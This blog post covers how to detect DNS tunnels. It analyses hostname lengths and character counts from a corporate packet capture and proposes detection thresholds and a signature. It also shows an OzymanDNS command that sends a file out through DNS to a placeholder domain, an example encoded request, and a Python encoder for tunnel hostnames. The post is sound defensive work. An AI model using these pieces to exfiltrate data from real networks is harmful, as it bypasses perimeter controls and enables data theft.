“I assume you all know the benefits of using a bastion host and filtering all other hosts out so people don’t tunnel data in UDP packets. Well, it’s not enough anymore.”
Oskar Pearson, 1998 on Bugtraq
That was ten years ago. Since then:
- Frodo & Sky, NSTX “Name Server Transport”, 2000: [docs] [earliest ref]
- Kaminsky, BlackHat 2004 on DNS tunnelling. [ppt slides] [source]
- Split DNS: Consistently referenced as the best practice for enterprise DNS deployment.
- Google for help finding DNS tunnels – hit two: “Software which has functionality to detect this is unfortunately in scarce supply.” [ref]
The frustrating world of an enterprise network administrator
You have configured your network with split DNS. You have implemented “block all, allow by exception” at the firewall and have documented every exception. You use an authenticated web proxy and require authentication for each new HTTP session. Yet once an attacker gains execution, with no prior knowledge of your network and little effort, he can still tunnel arbitrary traffic through your perimeter. (And we know arbitrary code execution is inevitable.)
Even with awesome funding and a rockstar team, there is little you can do short of blocking all external DNS for internal hosts. Neither industry nor academia has shipped the right tools to detect DNS protocol abuses. The only two reasonable recommendations are static signatures to detect public tunnel implementations or traffic analysis with Sguil to detect unusual transfer rates.
Analysis of Current Recommendations
Static signatures are necessary but insufficient. At the static signatures link above, the first recommended signature alerts on 20 TXT record requests within 60 seconds. The second recommended signature alerts on the unique value NSTX puts in the DNS header. Unfortunately, DNS tunnels do not have to use TXT records – and if they do use TXT records, they are certainly not required to make 20 TXT requests within 60 seconds. (With the implementations below, 19 requests/second would yield about 2 kBytes/second exfil and 9.5 kBytes/second infil.) Finally, they don’t have to include NSTX’s hardcoded value. Static signatures highlight gross offenses, but do not assume they make your network secure.
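The back-of-the-envelope math behind those rates can be sketched as follows. The per-request payload matches OzymanDNS’s ~110 raw bytes per hostname request discussed later; the per-response figure is an assumption:

```python
# Rough bandwidth for a tunnel pacing itself just under the
# "20 TXT requests in 60 seconds" signature threshold.
# Payload sizes are illustrative assumptions: ~110 raw bytes per
# hostname request (exfil), ~500 bytes per TXT response (infil).

requests_per_second = 19      # just under the signature's rate
exfil_per_request = 110       # bytes of data per outbound request
infil_per_response = 500      # bytes of data per TXT answer (assumed)

exfil_rate = requests_per_second * exfil_per_request     # ~2 kB/s
infil_rate = requests_per_second * infil_per_response    # ~9.5 kB/s
print(exfil_rate, infil_rate)  # 2090 9500
```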
The Sguil analysis is better than static signatures, but is easily circumvented. Bianco looks for “lopsided transfers,” when the gross transfer rate (src_bytes / dst_bytes) is greater than a hardcoded ratio (2x, in his case) and the client-server pair has transferred at least 50k bytes in the previous 24 hours. While the methodology does not limit analysis to TXT records, there are still problems:
- It only examines a single client-server IP pair. DNS’s intrinsic redundancy/forwarding/recursion make IPs less important. Regardless of where your IDS sits in the network hierarchy, two consecutive requests from the same client to the same domain name may not have the same source & destination IPs.
- The ratio is crucial to detection. As Bianco notes, he looks only for DNS infil or DNS exfil. If the amount of data transferred is roughly balanced between client and server, the ratio won’t break the threshold. (i.e., if the attacker downloads 10 MB, he needs to upload between 5 and 20 MB to keep the ratio below the threshold)
- The ratio is too simple a measure for small transfers, so Bianco needed a safety net: only client-server pairs with at least 50k transferred in the previous 24 hours.
It’s less brittle than a signature, but it still requires static thresholds. Like the snort signatures, anything below the threshold is off your radar.
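For concreteness, the heuristic can be sketched in a few lines of Python. The function name and exact direction handling are my own; Bianco’s actual version is a query over Sguil’s session database:

```python
# Sketch of the "lopsided transfer" heuristic: flag a client-server
# pair when the byte ratio in either direction exceeds 2x AND at
# least 50 kB moved between the pair in the previous 24 hours.

def lopsided(src_bytes: int, dst_bytes: int,
             ratio: float = 2.0, floor: int = 50_000) -> bool:
    if src_bytes + dst_bytes < floor:
        return False                  # the 50k safety net
    bigger = max(src_bytes, dst_bytes)
    smaller = max(min(src_bytes, dst_bytes), 1)  # avoid divide-by-zero
    return bigger / smaller > ratio

print(lopsided(10_000_000, 6_000_000))   # balanced enough: False
print(lopsided(10_000_000, 1_000_000))   # 10x lopsided: True
print(lopsided(40_000, 1_000))           # under the floor: False
```

Note how both failure modes from the list above show up directly: a balanced two-way tunnel never breaks the ratio, and anything under the 50 kB floor is invisible.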
One final consideration:
Joanna was talking about rootkit detection, but the idea is the same.
DNS tunnels in practice
DNS revolves around reliability and forwarding. If a DNS server cannot answer a question, it asks the authoritative server. When an attacker controls both the client asking the question and the server providing the response, he can transfer arbitrary data, but only within the bounds of the protocol specification.
As Bianco noted, DNS tunnel traffic can flow in three ways: data infil only, data exfil only, or full two-way communication. The DNS server cannot initiate communication; it can only respond to requests from the client. The response from a DNS server can be any one of a dozen different types (A, CNAME, TXT, MX, etc.) and each of these is formatted differently. But for all the diversity in the server’s response format, each response must correspond to a request, and requests have only one format: a hostname and the desired record type.
From RFC 1035, hostnames must meet the following criteria:
- Allowed characters: a-z, 0-9, and - (dash); a total of 26 + 10 + 1 = 37 characters
- Labels (between the .’s) of 63 characters or fewer
- Total size of 255 characters (including ‘.’ label delimiters) or fewer
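Those constraints are easy to express in code. A minimal sketch, validating against the list above rather than the full RFC grammar:

```python
import re

# The RFC 1035 constraints listed above: labels of letters, digits,
# and dashes; each label <= 63 chars; whole name (with dot
# delimiters) <= 255 chars. DNS names are case-insensitive.

LABEL = re.compile(r"^[a-z0-9-]{1,63}$", re.IGNORECASE)

def valid_hostname(name: str) -> bool:
    if len(name) > 255:
        return False
    return all(LABEL.match(label) for label in name.rstrip(".").split("."))

print(valid_hostname("mail.example.com"))   # True
print(valid_hostname("x" * 64 + ".com"))    # label too long: False
```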
Data exfil and full two-way comms require the client to encode outbound data in questions. We can identify those abuses by analyzing only outbound hostname requests. This simplifies analysis significantly and leaves only data-infil traffic uninspected. While data infil over DNS has potential benefits for an attacker (refer to the Blackhat 2008 talk on DNS shellcode [pdf slides]), the danger relative to data exfil or two-way communications is significantly reduced.
Real-world DNS hostname request analysis
The following analysis was completed on a packet capture from a small-ish corporate network perimeter with split DNS and 100s of hosts. In total, about 97,000 outbound DNS requests over an hour.
Based on the rationale above, I selected 3 characteristics of the hostname requests to analyze.
- Length of hostname
- Count of unique characters (suspecting base32’d text has a higher count than “normal” text)
- Request type (a 16-bit field; dozens of defined types, about ten ‘typical’ types)
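Extracting those three characteristics from a request is straightforward. A sketch (the function name is mine; in practice the hostname and type come from parsed pcap data, and the unique-character count here ignores dots and case):

```python
# Compute the three per-request characteristics analyzed below:
# hostname length, count of unique characters, and request type.

def characteristics(hostname: str, qtype: int) -> dict:
    stripped = hostname.rstrip(".")
    return {
        "length": len(stripped),
        "unique_chars": len(set(stripped.lower().replace(".", ""))),
        "qtype": qtype,
    }

print(characteristics("www.example.com", 1))
# {'length': 15, 'unique_chars': 9, 'qtype': 1}
```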
The chart above shows the distribution of hostname lengths for all 97,000 recorded requests. The x-axis only extends to 76 because that was the absolute maximum recorded value, despite the DNS RFC’s maximum of 255. The spike between 31 and 39 results from the internal SMTP server: for every SMTP session, it queries the SORBS real-time blackhole list. Each connection causes a request such as:
The height of the spike is relative to the number of connections to the mail server during the capture; the width is due to IP address length variations.
The spike clustered around 26 comes from outgoing reverse lookups, of the format:
Again, the width of the spike is related to IP length variability.
The final spike around 25 is from 5,000 myspace.com A record requests of the form:
During the capture, one or more hosts queried nearly every record from myspace-000 to myspace-999 and each request was sent to four nameservers. I do not have an explanation for this anomaly; perhaps it’s a bug in some two-bit multimedia app streaming videos from Limelight Networks.
If we break out the RBL and reverse lookups, the resulting chart of hostname lengths is more reasonable. Removing the 3 known oddities, hostname request lengths are roughly normally distributed around 18 characters.
The next chart is the count of characters per hostname request. Any request exfil’ing arbitrary data must encode it into the 37 characters allowed by DNS. Any encoding method will increase the entropy of a hostname request over normal lookups, unless the attacker sacrifices his encoding efficiency and thus his bandwidth. The absolute maximum value recorded was 29, but counts taper off dramatically in the low 20s. The spike around 19 is also due to the SORBS RBL requests.
Internationalized Domain Names, the scheme to support unicode DNS names, will increase the character count and average lengths. Relative to DNS tunnel implementations, the differences are minor.
- Length: overall average 28.0, std dev 7.9
- Character count: overall average 15.6, std dev 3.6
Without the 3 oddities, lengths and character counts are roughly normally distributed. Statisticians will tell you to ignore the oddities and roll, quoting the Central Limit Theorem and Chebyshev’s Inequality as support. With those considerations, we calculate the following upper thresholds:
- Length: 99.75% less than 28 + 3(7.9) = 52 characters
- Character count: 99.75% less than 15.6 + 3(3.6) = 27 characters
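The threshold arithmetic can be reproduced directly. The sample list below is made up for illustration; the final two lines redo the post’s calculations with its measured statistics:

```python
import statistics

# Three-sigma upper threshold: flag anything beyond
# mean + 3 * standard deviation of the observed distribution.

def upper_threshold(values):
    return statistics.mean(values) + 3 * statistics.pstdev(values)

lengths = [12, 18, 22, 17, 30, 15, 19, 21]   # made-up hostname lengths
print(upper_threshold(lengths))

# With the measured stats from the capture:
print(28.0 + 3 * 7.9)   # length threshold: ~52 characters
print(15.6 + 3 * 3.6)   # character-count threshold: ~27 characters
```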
Real-world analysis of DNS tunnel traffic
The real question: how do the thresholds compare to the available DNS tunnels? There are only three publicly-available DNS tunnel implementations: NSTX, OzymanDNS and dns2tcp. (I can’t find source for Pearson’s implementation. If you can put your hands on it, mail me.)
Kaminsky’s Ozyman implementation uses hostname requests for the outbound, and TXT records on the return. The format of the outbound requests is:
- data – base32’d data, up to 110 bytes before encoding, 176 after encoding.
- nonce – a safety check for DNS servers that do not respect TTLs
- checksum – checksum of the data blob; actually unused. Always zero.
- sessid – a session id for the server to keep track of clients.
To transfer the Ozyman DNS source tarball to the server at domain.com:
guy$ cat ozymandns_src_0.1.tar.gz | ./droute.pl domain.com
Yields a request similar to:
mfzwwyjoobwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaytambxgayaambq. 59534-0.id-40145.up.domain.com.
Char count: 27
176 bytes of base32 encoded data in the first three labels, 17 bytes of housekeeping, a 9 byte domain name and 7 label separators. This is a simplified description of his transport, but you get the idea.
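The outbound encoding can be sketched as follows. This is an approximation of the format shown above, not the actual droute.pl code; the sequence, checksum, and session values are simplified placeholders:

```python
import base64

# OzymanDNS-style outbound request: base32 the payload, split it
# into <=63-character labels, append housekeeping and the domain.
# The "0-0" and session id fields here are made-up placeholders.

def encode_request(data: bytes, domain: str, session_id: int = 12345) -> str:
    b32 = base64.b32encode(data).decode().lower().rstrip("=")
    labels = [b32[i:i + 63] for i in range(0, len(b32), 63)]
    return ".".join(labels + [f"0-0.id-{session_id}.up", domain])

req = encode_request(b"hello world", "domain.com")
print(req)   # nbswy3dpeb3w64tmmq.0-0.id-12345.up.domain.com
print(len(req) <= 255)   # still fits the RFC 1035 limit: True
```

Even with this toy payload, the data labels are exactly the kind of high-entropy, high-character-count strings the thresholds above are built to catch.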
NSTX uses the same techniques. A review of the source shows a maximum of 3 × 63-byte labels on hostname requests, with TXT records on the return. Hostname lengths will exceed 189 bytes under full load. NSTX uses a case-sensitive encoding; if your character count is case-sensitive, its requests will greatly surpass DNS’s 37-character case-insensitive maximum.
UPDATE: A reader brought my attention to dns2tcp, a third public DNS tunnel implementation by the (awesome) hsc.fr guys. dns2tcp also uses base64, so character counts will be huge if your counts are case-sensitive. Hostname request lengths are about 190 under full load, with TXT records on the return.
These public DNS tunnel implementations destroy the length and character count thresholds. Even simpler than Bianco’s src_bytes / dst_bytes ratio, analyzing only hostname requests is enough to detect the NSTX, OzymanDNS, and dns2tcp implementations. While false positives will appear, visual inspection will immediately recognize encoded data. The thresholds could be improved even further by a high-level categorization of request type. In this case, we could have created 3 thresholds:
- Requests to the SORBS RBL
- Requests for reverse lookups
- All other requests
“All other requests” has significantly lower thresholds than the combination of all three categories.
Alternatively, thresholds could be set arbitrarily high. It is obscured by the volume, but there are hundreds of requests with lengths greater than 52 characters. The false positive rate will be too high for many organizations. There were no requests with length greater than 76 characters, but both DNS tunnel implementations have significantly higher request lengths. A “sanity check” length threshold around 75 would provide some peace of mind.
The largest problem with outgoing hostname analysis is the toolchain. The analysis requires an IDS parsing application-level data. Some commercial IDSes parse application-level traffic and have alerts in place, but none of the IDSes I’m familiar with abstract it into a generic application-level signature engine. A commercial vendor with an application-level-aware IDS could wrap request analysis into a built-in signature, but the thresholds will vary for each organization. The arbitrary threshold a vendor configures will be the lowest common denominator of all organizations. I want the ability to write a signature such as:
length(dns.request.hostname) > 52 and (not "sorbs" in dns.request.hostname) and (not "in-addr.arpa" in dns.request.hostname)
…and apply it to all DNS traffic, then tweak the logic as I more deeply understand my perimeter’s traffic. Alas, all I usually get is a clumsy web GUI and a few checkboxes.
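Lacking such an engine, the same logic is trivial to express over parsed DNS requests. A sketch in plain Python; the whitelist substrings and the 52-character threshold come from the analysis above:

```python
# The desired signature as a hand-tunable predicate: long hostname
# requests are suspicious, except known-noisy RBL and reverse lookups.

def suspicious(hostname: str, length_threshold: int = 52) -> bool:
    name = hostname.lower()
    if "sorbs" in name or "in-addr.arpa" in name:
        return False                      # whitelisted lookup classes
    return len(name.rstrip(".")) > length_threshold

print(suspicious("www.example.com"))                         # False
print(suspicious("mfzwwyjoobwaaaa" * 5 + ".up.domain.com"))  # True
```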
Vendors: make your products flexible and smarter than your average customer. Those with the desire and capability will pay whatever you ask.
Colleagues: how universal are these thresholds? I have code to parse pcaps and output these statistics. Email me and I’ll send them to you. Send me your statistics and I’ll post them all in a single place. Post it on your own blog and I’ll link to it.
It is ironic I start this post ranting against static thresholds and then end it by suggesting one. Stay tuned; I have an answer to this disparity in development!